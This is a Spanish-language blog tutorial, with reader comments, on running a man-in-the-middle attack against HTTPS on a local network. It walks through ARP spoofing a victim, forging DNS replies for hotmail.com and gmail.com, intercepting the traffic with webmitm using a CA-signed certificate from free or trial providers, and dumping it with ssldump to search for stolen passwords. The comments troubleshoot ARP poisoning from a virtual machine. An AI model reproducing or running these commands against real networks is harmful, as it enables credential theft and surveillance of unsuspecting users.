Interceptando comunicaciones web cifradas (I)
Mostramos a continuación un ejemplo muy sencillo y rápido de como llevar una ataque de spoofing en una LAN. Con él conseguiremos ver todo el tráfico del usuario atacado en tiempo real, a partir de un archivo donde volcaremos esa información y en pantalla. Para llevar a cabo el ataque todos los comandos tienen que ser ejecutados con derechos de administrador.
- Nos aseguramos que tenemos instalado el software necesario: openssl y la suite dsniff
- Generamos nuestro certificado. No voy a explicar como, hay millones de howto por ahí.
- Conseguimos que nos lo firme un CA Válido y confiable. Esto es lo difícil. Necesitamos dinero o:
(a) Que nos lo firme entidades que no nos cobran (http://cert.startcom.org/ , http://www.cacert.org/). El problemas de estos CA es que los navegadores no se suelen fiar mucho de ello.
(b) Podemos hacer que nos los firmen entidades confiables. Esto normalmente cuesta dinero (y mucho), pero muchas de ellas te lo firman, como una versión de prueba podríamos decir, para 30 días. Para nuestros propósitos nos sobra. Un ejemplo de entidades que hacen esto puede ser: http://www.rapidssl.com/ssl-certificate-products/free-ssl/freessl.htm
- Antes de seguir tentemos que activar el forwarding:
echo "1" > /proc/sys/net/ipv4/ip_forward
- Hacemos un ataque arp spoofing a la víctima a la que queremos ver su tráfico SSL. El parámetro “-t” especifica el usuario al que vas ha atacar y la otra IP la de la puerta de enlace de tu red:
arpspoof -t IP_VICTIMA IP_PUERTA_DE_ENLACE -i INTERFAZ_DE_RED
- Creamos un fichero con los sitios por los que nos queremos hacer pasar:
Fichero: sitios.txt
[...]
MI_IP hotmail.com
MI_IP gmail.com
[...] - Spoofeamos la respuestas del DNS, imponiendo los valores que definimos en el fichero “sitios.txt”:
dnsspoof -f sitios.txt -i INTERFAZ_DE_RED
- Hacemos el MITM, usando el certificado SSL que nos generamos y que la entidad firmó como confiable. Para que webmitm lo use tenemos que copiarlo al directorio donde vayamos a lanzar webmitm y llamarlo: “webmitm.crt”.
webmitm -d
- Por último recogemos la información que nos proporciona webmitm y lo guardamos en un archivo que podamos consultar. Para que nos muestra en pantalla los resultados y se recojan a la vez en un archivo usaremos la instrucción de Linux tee. El comando completo es el que sigue:
ssldump -n -d -k webmitm.crt -i INTERFAZ_DE_RED | tee archivo_salida.txt
- Finalmente podemos consultar el archivo “archivo_salida.txt” en busca de contraseña interceptadas.
Aún no hay trackbacks.
20 febrero, 2011 - 06:32
Hola, espero que me puedan ayudar…
tengo una Macbook Pro corriendo OS X e instale backtrack 4 R2 en virtualbox para hacer MITM estoy utilizando ettercap -G (la version GUI) primero puse la tarjeta en mode de puente tambien descomente la linea en el archivo /etc/etter.conf “IP tables”, ya he hecho “” echo 1 > /proc/sys/net/ipv4/ip_forward “‘ pero cada vez que empiezo, luego del ARP poisoning la PC victima se queda sin internet, es como si el no sirviera el reenvio de paquetes.. he investigado,revisado, pero aun no logro hacer que funcione.Mis preguntas son:
Que estoy pasando por algo.?
Ya que puedo hacerlo sin pobremas en mi otra laptop que corre Backtrack4-R2 solamente la ultima opcion que me queda es que el problema se debe a que esta es una maquina virtual. como puedo saber si es eso?
si alguien tiene la solucion porfavor respondame al correo.
27 febrero, 2011 - 16:29
Hola freddy,
Antes de nada. No respondemos al correo privado, las respuestas se hacen aquí para que todo el mundo pueda ver las soluciones propuestas.
En respuesta a lo que preguntas lo más probable es que, efectivamente, sea por la virtualización. La pregunta es:
¿Por qué?
=======
Cuando estás haciendo un MITM el ataque más típico se basa en la reinyección de respuestas ARP. Para esto tienes que controlar el tráfico ARP en la máquina con la que estás atacando.
Cuando usas un sistema virtualizado, aunque lo hayas brigeado, el tráfico que reenvías tiene que pasar por la máquina física. Eso significa que no tienes conexión directa con la linea de red que estés usando. Cuando haces el ataque, a base de ARPs, el sistema anfitrión te filtrará/rechazará ciertos paquetes que creerá que están dirigidos a él y no llegarán a la máquina virtual, con lo que ataque no surtirá efecto.
Soluciones:
=======
* 1 – O bien utilizas un sistema de red que pase por alto al sistema físico: USB, PCMCIA…
* 2 – O bien instalas la backtrack (o la arrancas en modo live) en el PC donde la quieras usar y la arrancas directamente.
Espero haber contestado a tus preguntas.
Un saludo.